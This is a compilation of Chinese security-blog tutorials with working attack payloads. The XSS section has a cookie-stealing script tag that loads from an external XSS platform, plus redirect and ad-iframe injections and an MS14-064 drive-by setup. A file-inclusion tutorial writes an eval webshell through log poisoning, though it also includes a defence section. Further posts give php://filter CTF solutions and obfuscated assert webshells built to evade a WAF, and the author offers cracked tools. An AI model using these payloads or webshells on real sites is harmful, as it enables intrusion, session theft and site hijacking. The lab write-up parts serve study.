phpStudy 小皮 Windows面板 存在RCE漏洞（nday） https://mp.weixin.qq.com/s/VcD3Gb8oTk0d5bW72e0P-A

XSS高级用法，SEO，挂ma，MS14_064利用 XSS高级用法，SEO，挂ma，MS14_064利用以下所有的针对XSS的利用方式都是对XSS的深一步的学习了解、请勿于未授权环境下进行非法操作！！！xss平台：https://xssaq.com/<sCRiPt sRC=//xs.pe/PNb></sCrIpT> 这里有一个xsslabs，利用我们的payloadxss平台已上线查看功能这里面有源码，xss站点的ua头，还有存储用户cookie信息机器的真实IP地址地址很明确，是我自己的地址广告传播/SEO优化/刷取流量原理通过恶意的xss代码将正常的页面跳转到目的地的页面，利用网站进行重定向实现引流、广告位传播等等。实操恶意刷取访问量，网页直接跳转<script type="text/javascript">window.location.href="跳转的目的地址";</script> <script type="text/javascript">window.location.replace("跳转的目的地址");</script> <script type="text/javascript">window.location.assign("跳转的目的地址");</script> 注入成功，再次访问这个页面就会自动跳转到你的页面，从而达到访问量+1第二种，网页延迟跳转<script type="text/javascript"> 　　function jumurl(){ 　　window.location.href = 'https://www.baidu.com'; 　　} 　　setTimeout(jumurl,3000); </script> 恶意广告展示（需要5块钱吃外卖的记得扫个码嘞，美团优惠卷+平台双减）<script>document.writeln("<iframe scrolling='no' frameborder='0' marginheight='0' marginwidth='0' width='2000' height='5000' allowTransparency src=https://pic1.zhimg.com/v2-656b7df981ea18d18f196995f477d75d_xll.jpg?source=32738c0c&needBackground=1></iframe>");</script> 三、网页挂马/权限提升（MS14_064）目的  通过木马服务器（kali）搭建生成一个恶意URL地址，并通过存储型XSS挂到页面中。只要存在未打相应补丁的用户访问了挂马页面，恶意攻击者便获取到了受害者的控制权限（重点在于目的系统是否打了相应补丁）环境木马服务器（kali MS14-064 IP:192.168.7.129） 受害者（Windows Server 2003 R2 IP:192.168.7.136） 存在 XSS 的服务器（Win10 DVWA靶机 IP:192.168.1.103）MS14_064：受影响的操作系统版本有：Windows Vista、Windows Server 2012、Windows Server 2008、Windows RT、Windows 8.1、Windows 8 以及 Windows 7.打开msf搜索 ms14_064依次设置好参数没有成功，不知道为什么，我win7补丁都卸载了，这里只做演示，可以参考下文https://blog.csdn.net/theRavensea/article/details/136793078 XSS插入地址这个时候就能利用存储型xss漏洞将木马服务器生成的地址插入到网站中，这样只要有人的电脑存在该漏洞，就能上线：可自行测试，我这里不是全新的win7，没有成功学习于：https://blog.csdn.net/Aaron_Miller/article/details/105918848  

从零开始学习文件包含 从零开始学Web安全，文件包含漏洞详解大家好，我是[小羽]，一个对网络安全充满热情的小白。今天，我将与大家分享我的网络安全中的Web安全学习笔记什么是文件包含漏洞？，这里很详细的介绍了Sql注入的各种类型防御的方法。靶场：dvwa,pikachu服务器：centos7数据库：mysql5.7php：8.0nginx：1.24什么是文件包含漏洞？概述和sql注入等攻击方式一样，文件包含漏洞也是一种注入型漏洞，其本质就是输入一段用户能够控制的脚本或者代码，让服务端执行。包含：把可重复使用的函数写入到单个文件中，在使用该函数时，直接调用此文件，而无需再次编写函数，这一过程叫做包含。有时候由于网站功能需求，会让前端用户选择要包含的文件，而开发人员有没有对要包含的文件进行安全考虑，攻击者就可以通过构造恶意的文件路径参数来执行任意的代码。常见的文件包含漏洞有两种类型： 本地文件包含（Local File Inclusion）：LFI本地文件包含漏洞是指攻击者能够利用应用程序的漏洞，直接访问并执行服务器上的文件。 远程文件包含（Remote File Inclusion）：攻击者能通过将一个远程文件包含到应用程序中来执行任意代码，这种漏洞通常存在在于动态包含外部资源的代码中。 攻击者可以利用文件包含漏洞来执行一系列攻击，比如读取敏感文件、执行恶意代码、获取数据库信息等。以PHP为例，常用的文件包含函数有以下四种 函数 描述 特点 require() 找不到被包含的文件会产生致命错误，并停止脚本运行 在一开始就加载 include() 找不到被包含的文件只会产生警告，脚本继续执行 在用到时加载 include_once() 如果该文件的代码已经被包含，则不会再次包含 与include()类似 require_once() 如果该文件的代码已经被包含，则不会再次包含 require()类似 漏洞利用过程一、本地文件包含漏洞(LFI)php代码示例：<?php $file=$_GET(['filename']); include($file) ?>python代码示例：file=request.GET.get('filename')#django with open(filename,mode='r') as f: print(f.read())我们可以利用文件包含读取到一些其他文件，甚至可以读取一些系统的敏感信息如系统的配置器文件:C:Windowssystem.ini文件（很危险）DVWA首先在我们centos系统中根目录创建一个demo1.txt写入'you are very good hacker!'进入dvwa靶场File Inclusion点击任意文件后，观察到url的变化为文件名称的变化 使用../../../../../../../demo1.txt尝试读取刚才创建的文件demo1.txt漏洞利用成功！此时也可直接读取系统配置文件例如hostsPiKaChu选择下拉框任意选项，分析url，找到文件名称如下图 使用../../../../../../../demo1.txt尝试读取刚才创建的文件demo1.txt注意：在文件包含漏洞中通常配合文件上传使用二、远程文件包含漏洞远程文件包含漏洞就是在不同ip/域名之间进行文件包含操作，需要将php.ini中的allow_url_include = On打开，如下图比如这里有一个远程文件：https://xiaoyus.cc/license.txt漏洞利用成功！三、包含Apache/Nginx日志文件有时候网站存在文件包含漏洞，但是却没有文件上传点。这个时候我们还可以通过利用Apache的日志文件来生成一句话木马。我们通过访问，让访问日志记录我们的phpinfo();代码，可以看出，访问日志已经成功记录了我们的访问历史：注意：需要开启服务器记录日志功能<?php phpinfo();?>日志访问成功但是我们发现了日志使用的是url编码，而不是完整的php代码这里我们就需要使用到抓包工具burp suite进行请求拦截，然后修改参数值为完整的php代码查看日志，日志写入成功接下来利用文件包含漏洞访问日志的文件地址我这里是www/server/nginx/logs/access.log日志文件注入成功！让访问日志文件记录下写入文件脚本代码：<?php $file=fopen('test1.php','w'); fputs($file,'<?php @eval($_POST[666]);?>'); ?>访问内容修改： 可以看见日志文件写入成功 对访问日志进行文件包含，并查看创建的一句话脚本，已经创建成功：查看源文件，也可以看到创建成功 此时就可以使用蚁剑进行连接获取webshell如何避免？一、设置白名单代码在进行文件包含时，如果文件名称可以确定，可以设置白名单对传入的参数进行比较。PHP验证源码示例：<?php $file_list=[ //声明一个变量，用于存放白名单； 'framework/init.php', 'framework/route.php', 'framework/event.php', ]; $file= $_REQUEST['file']; //声明一个变量，用于接收传递过来的文件信息； if (in_array($file, $file_list)){ //把传递过来的文件信息和白名单里面的文件进行对比； include "$file"; //如果传递过来的文件是白名单里面的文件，就对它进行文件包含； } ?>python验证源码示例：file_list=[ 'framework/init.php', 'framework/route.php', 'framework/event.php', ] file=requests.GET.get('file') if file in file_list: with open(file,mode='r') as f: content=f.read() print(content) else: print('该文件不在许可范围内')二、过滤危险字符由于Incbude/Require可以对PHP Wrapper（包装器）形式的地址进行包含执行(需要配置php.ini)在linux环境中可以通过"../../"的形式进行目录绕过，所以需要判断文件名称是否为合法的PHP文件。验证源码示例：$pattern= "#^[a-z][a-z0-9+.]*:?//#i"; if(substr($filename,-4)=='.php' && strpos($filename,"..")===false&&!preg_match($pattern, $filename)){ include "$file"; }python源码示例：import re import os parttern='"#^[a-z][a-z0-9+.]*:?//#i' def include_file(filename): if filename.endswith('.php') and '..' not in filename and not re.search(pattern,filename(): with open(filename,'r') as f: file=f.read() print(file) include_file('demo.php')四、设置文件目录PHP配置文件中又open_basedir选项可以设置用户需要执行的文件内目录，如果设置目录的话，PHP仅仅在该目录内进行文件搜索，而不会去搜索其他文件四、关闭危险配置PHP中的allow_url_include选项如果打开，PHP会通过Include/Require进行远程文件包含，由于远程文件的不可信任及其不确定性，在开发中禁止打开次此选项，PHP默认是关闭的。五、最小权限原则做好管理员权限划分，做好文件的权限管理，allow_url_include和allow_url_fopen最小权限化感谢！原文地址https://mp.weixin.qq.com/s/0Ayr8cp5nxti787c1sg54g

文件包含_PHP filter伪协议利用方式 前言本文主要讲解php filter伪协议，文件包含漏洞php://filter伪协议是PHP中独有的一种协议，它是一种过滤器，可以作为一个中间流来过滤其他的数据流。通常使用该协议来读取或者写入部分数据，且在读取和写入之前对数据进行一些过滤，例如base64编码处理、rot13处理等。php://filter伪协议主要用于一体式（all-in-one）的文件函数，如readfile()、file()、file_get_contents()等，这些函数在数据流内容读取之前没有机会应用其他过滤器，而php://filter伪协议则可以在读取或写入数据时对数据进行过滤处理。基本语法php://filter伪协议的基本语法如下：php://filter/<action>/resource=<待过滤的数据流><action>：表示要对数据执行的过滤操作，如读取（read）、转换编码（convert）或字符串操作（string）等。<待过滤的数据流>：通常是要读取或写入的文件路径或URL。过滤器分类php://filter伪协议支持的过滤器主要分为以下几类：字符串过滤器：以string开头，对数据进行字符串处理，如rot13、toupper、tolower、strip_tags等。string.rot13：使用当前字母在字母表后第13个字母替换当前字母。string.toupper、string.tolower：将字符串转换为大写或小写。string.strip_tags：去除字符串中的HTML、XML和PHP标签。转换过滤器：以convert开头，对数据进行编码转换，如base64编码、解码，quoted-printable编码、解码，iconv字符编码转换等。convert.base64-encode/decode：对数据进行Base64编码或解码。convert.quoted-printable-encode/decode：对数据进行Quoted-Printable编码或解码。convert.iconv..：对字符串进行字符编码转换。压缩过滤器：如zlib.deflate（压缩）、zlib.inflate（解压）、bzip2.compress（压缩）、bzip2.decompress（解压）等。加密过滤器：如mcrypt.、mdecrypt.等，用于数据的加密和解密。使用示例以下是一些使用php://filter伪协议的例子：读取文件并进行Base64编码：php复制代码 echo file_get_contents("php://filter/convert.base64-encode/resource=index.php");这行代码会读取index.php文件的内容，并将其进行Base64编码后输出。写入文件并进行Base64解码：php复制代码 file_put_contents("php://filter/write=convert.base64-decode/resource=shell.php", base64_encode("<?php phpinfo(); ?>"));这行代码会将Base64编码的字符串写入shell.php文件，并在写入前进行Base64解码，最终shell.php文件中将包含原始的<?php phpinfo(); ?>代码。注意事项在使用php://filter伪协议时，需要注意过滤器的选择和数据流的指定，以确保数据的正确处理和安全性。在某些环境下，出于安全考虑，可能会对php://filter伪协议的使用进行限制或禁用。靶场复现实战之前，请大佬来吃瓜题1题目ctfshow这里我们的练习题目是，ctfshow的web87，分析源码，file_put_contents函数，将$content的内容（前面附加了一段PHP代码<?php die('大佬别秀了');?>）写入到URL解码后的$file指定的文件中。这段附加的PHP代码会在文件被包含或执行时显示"大佬别秀了"这里，我们可以将我们的payload和这段die代码，对他进行base64编码，发现都是乱码如果我们在base64编码前面加几个字符呢，我们的php一句话木马就可以直接读出来了我们将他复制到这里，进行传参绕过方式参考：全编码工具推荐棱角社区的https://forum.ywhack.com/coding.php首先将我们的payload进行全编码然后再使用ur编码对目标文件进行传参?file=【你的payload】此时我们去访问我们上传的php代码，文件列表已经列出来了找到源码题2ctfshow的练习web116提示只有这一个视频查看源码也没发现什么东西那就从文件下手我们拿010编辑器看文件尾部，发现是一个图片结束的16进制的图片文件图片进制表这里我们查找有没有png的内容找到指定选项从这里开始一直到最后，把他复制下来新建一个文本文件粘贴保存png图片发现是源代码，检查过滤协议发现file和php协议没有过滤，抓包即可，php协议测试file协议测试

文件上传10种waf绕过姿势 基础篇：https://mp.weixin.qq.com/s/od0djMG4iwO755N2YgDAHg环境搭建首先去官网下载安全狗，进行网站配置，或者后台回复【安全狗】，靶场源码和WAF软件都准备好了，都是最新版本的，直接下载就行安全狗配置文件防护规则这里用upload-labs中的第六关进行文件上传测试第六关是在文件后缀添加一个空格就可以上传成功WAF环境已搭好WAF绕过基于文件名称的绕过%00截断首先上传一个php文件，抓包文件后面添加;.jpg将;的hex编码替换为00，造成00截断，如下效果知识扩展%00截断是一种在文件上传或URL处理过程中常见的安全绕过技术，它利用了某些编程语言或系统在处理字符串时的一个特性：即当遇到空字符（null character，ASCII码为0，即�或%00在URL编码中）时，会认为字符串已经结束，从而忽略了空字符之后的所有内容。可以看到，虽然绕过了WAF还是有代码红色警告没有上传成功，这个时候我们就可以在原来有代码漏洞的情况下，进行绕过，原来代码存在空格绕过，这里我们就用空格进行绕过，添加一个空格上传成功，点击查看源码，就可以看到文件上传的位置（这个图片的位置）多个等号这个操作就更简单了，直接在文件名的位置把一个等于换成多个等于，也能绕过WAF，此时再在末尾加空格，直接成功上传，如下哈哈，没有成功，原文是这样写的，可能已经修复了基于内容拦截绕过此时我们访问，这个php文件被拦截了，这就是基于内容的拦截，像经常使用的一句话木马都会被安全狗绕过[1].畸形传参木马这里要用到hackerbox谷歌插件或者使用火狐浏览器，默认下载不是破解的，我准备好了破解版本，后台私信【hackbox】即可<?php $a = $_GET['x']; $$a = $_GET['y']; $b($_POST['z']);//调用 $b 变量所引用的函数，并将 $_POST['z'] 的值作为参数传递给它。 ?>我们所使用的一句话木马是市面上最为常见的类型，因此几乎所有的WAF（Web应用防火墙）都能识别并拦截这段内容。这正是导致我们上传后无法访问的根本原因。为了验证这一点，你可以尝试开启安全狗的木马扫描功能，看看它是否能被检测出来，从而判断其是否具备免杀能力。上图可以看到并没有检测到，用get方式传如参数x和y，值分别为b和assert ，再用POST方式传如参数z，值为自己想执行的命令[2].经典编码木马通过assert函数的base64编码后的拼接即可绕过，如下：<?php $e=base64_decode("hellow小羽网安"); $e($_POST['aa']); ?>免杀情况我们将中文放在了后面，此时出现拦截我放在前面试试，还是拦截穿插进去，就可以了，不知道是什么原理，php特性、base64编码检测，还是安全狗防护机制，有大佬路过指教一下，谢谢你执行成功上面的绕过方式不可避免都有一些问题，那就是传参时使用了敏感关键字，比如phpinfo()之类的，有一些防火墙就会检测传入的参数是否含有敏感内容(例如宝塔)，那这时候我们怎么办呢？我们可以把传参使用的敏感关键字变成其他编码格式，比如base64，再在一句话木马中对传入的参数先做一个解码操作，如下在木马中添加解码操作<?php $e=base64_decode("YX小羽网安NzZ公众号XJ0"); $e(base64_decode($_POST['aa'])); ?>这个时候我们就可以将phpinfo拿去base64进行加密这个时候就可以执行php代码了，绕过了关键字的检测其他失败案例参考复写失败脏数据绕过失败修改为单引号失败去掉双引号失败.php放到引号的外面上传成功，但是并没有这个php文件查看上传之后的文件，并不是php文件那不加后缀试试，显示文件内容，并没有执行所以使用蚁剑也连接不了数据截断绕过-防匹配(; / 换行)失败参数多次失败总结本教程通过实际搭建环境，展示了文件上传中WAF的多种绕过技巧，包括%00截断、畸形传参木马、经典编码木马等。尽管部分绕过方法因WAF更新而失效，但实验过程揭示了安全机制与绕过技术的博弈。通过不断尝试与创新，攻击者总能找到新的突破点，而防御方则需持续更新策略以应对新威胁。这强调了持续安全监测与加固的重要性。网安学习不迷路，欢迎各位大佬加入讨论